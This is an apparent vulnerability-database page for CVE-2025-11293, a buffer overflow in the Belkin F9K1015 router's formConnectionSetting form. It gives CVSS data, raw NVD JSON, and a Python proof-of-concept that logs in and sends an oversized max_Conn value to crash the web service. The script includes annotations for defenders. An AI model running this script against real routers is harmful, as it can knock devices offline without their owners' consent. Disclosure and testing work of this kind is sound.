Security Vulnerability Report
CVE-2025-11293 CVSS 8.8 HIGH

CVE-2025-11293

Published: 2025-10-05 16:15:46
Last Modified: 2025-10-07 17:27:49

Description

A security vulnerability has been detected in Belkin F9K1015 1.00.10. Affected by this vulnerability is an unknown functionality of the file /goform/formConnectionSetting. The manipulation of the argument max_Conn leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:* - NOT VULNERABLE
Belkin F9K1015 firmware version 1.00.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
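#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11293 - Belkin F9K1015 formConnectionSetting Buffer Overflow PoC

Vulnerability: Buffer overflow via the max_Conn parameter (CWE-119 / CWE-120
               in the advisory; this PoC's author describes it as stack-based)
Target: Belkin F9K1015 v1.00.10
Endpoint: /goform/formConnectionSetting

What the script does: logs in to the web interface, then POSTs a 4096-byte
max_Conn value and classifies the outcome from the HTTP response (or the lack
of one). It carries no code-execution payload; the observable effect is an
abnormal response or a web service that stops answering.

Notes for defenders:
  * The advisory rates this PR:L, so the request needs an authenticated
    session. Restricting who can reach the management interface narrows
    exposure.
  * The advisory states the vendor did not respond; no fixed firmware is
    referenced on this page.
  * Log signal: a POST to /goform/formConnectionSetting whose max_Conn field
    is far longer than a connection count. This script also sends the fixed
    User-Agent "Mozilla/5.0 (compatible; CVE-2025-11293)".

NOTE(review): only the endpoint and the max_Conn argument come from the
advisory text. The /login.cgi path and the form field names "username",
"password", "submit" and "connMode" are this PoC's assumptions - confirm them
against the device before trusting a negative result.
"""
import sys

import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Every request below uses verify=False, so the router's certificate is never
# checked and the login credentials can be intercepted by anything on-path.
# The warning is silenced only to keep the output readable.
urllib3.disable_warnings(category=InsecureRequestWarning)


def exploit(target_url, username, password):
    """
    Send an oversized max_Conn value to formConnectionSetting and report
    whether the device reacted abnormally.

    Args:
        target_url: Base URL of the router web interface, without a trailing
            slash (for example "http://192.168.2.1").
        username: Web-interface account name.
        password: Web-interface account password.

    Returns:
        True when an abnormal reaction was observed (HTTP 500, the word
        "error" in the response body, a timeout, or a dropped connection).
        False when the login could not be completed, the request failed for
        another reason, or the device answered normally.

    The "error" substring match and the timeout/connection checks are
    heuristics: an unrelated error page or a network fault produces the same
    signal, so a True result is an indication, not proof.
    """
    session = requests.Session()

    # Step 1: Authenticate to the router web interface
    login_url = f"{target_url}/login.cgi"
    login_data = {
        "username": username,
        "password": password,
        "submit": "Login",
    }

    try:
        resp = session.post(login_url, data=login_data, verify=False, timeout=10)
        print(f"[*] Login attempt status: {resp.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Login failed: {e}")
        return False

    # Without an authenticated session, a failure in step 3 would say nothing
    # about the overflow, so stop here instead of reporting a misleading
    # verdict.
    if not resp.ok:
        print("[-] Login was rejected - result would be unreliable, aborting")
        return False

    # Step 2: Build the oversized max_Conn value.
    # 4096 bytes is the PoC author's choice; the advisory does not state the
    # size of the buffer behind max_Conn.
    overflow_payload = "A" * 4096

    # Step 3: Send the request to the formConnectionSetting endpoint
    exploit_url = f"{target_url}/goform/formConnectionSetting"
    exploit_data = {
        "max_Conn": overflow_payload,
        # Additional parameters that may be required by the form
        "connMode": "0",
        "submit": "Apply",
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-11293)",
    }

    try:
        print(f"[*] Sending exploit payload to {exploit_url}")
        resp = session.post(
            exploit_url,
            data=exploit_data,
            headers=headers,
            verify=False,
            timeout=10,
        )
    except requests.exceptions.Timeout:
        print("[+] Target may have crashed - timeout detected (possible overflow success)")
        return True
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused - target may have crashed due to overflow")
        return True
    except Exception as e:
        print(f"[-] Exploit error: {e}")
        return False

    print(f"[*] Response status: {resp.status_code}")
    print(f"[*] Response length: {len(resp.text)}")

    # Check if the device crashed or returned an unexpected response
    if resp.status_code == 500 or "error" in resp.text.lower():
        print("[+] Target may be vulnerable - abnormal response detected")
        return True

    # A normal response means nothing abnormal was observed. The original
    # returned True here as well, which made every completed run look like a
    # positive finding.
    print("[*] Request completed")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: {sys.argv[0]} http://192.168.2.1 admin admin")
        sys.exit(1)

    # The password is taken from argv, so it ends up in shell history and is
    # visible in the process list while the script runs.
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]

    print("=" * 60)
    print("CVE-2025-11293 - Belkin F9K1015 Buffer Overflow PoC")
    print("=" * 60)

    exploit(target, user, pwd)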

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11293", "sourceIdentifier": "[email protected]", "published": "2025-10-05T16:15:45.920", "lastModified": "2025-10-07T17:27:49.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Belkin F9K1015 1.00.10. Affected by this vulnerability is an unknown functionality of the file /goform/formConnectionSetting. The manipulation of the argument max_Conn leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": 
"https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327174", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327174", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661296", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}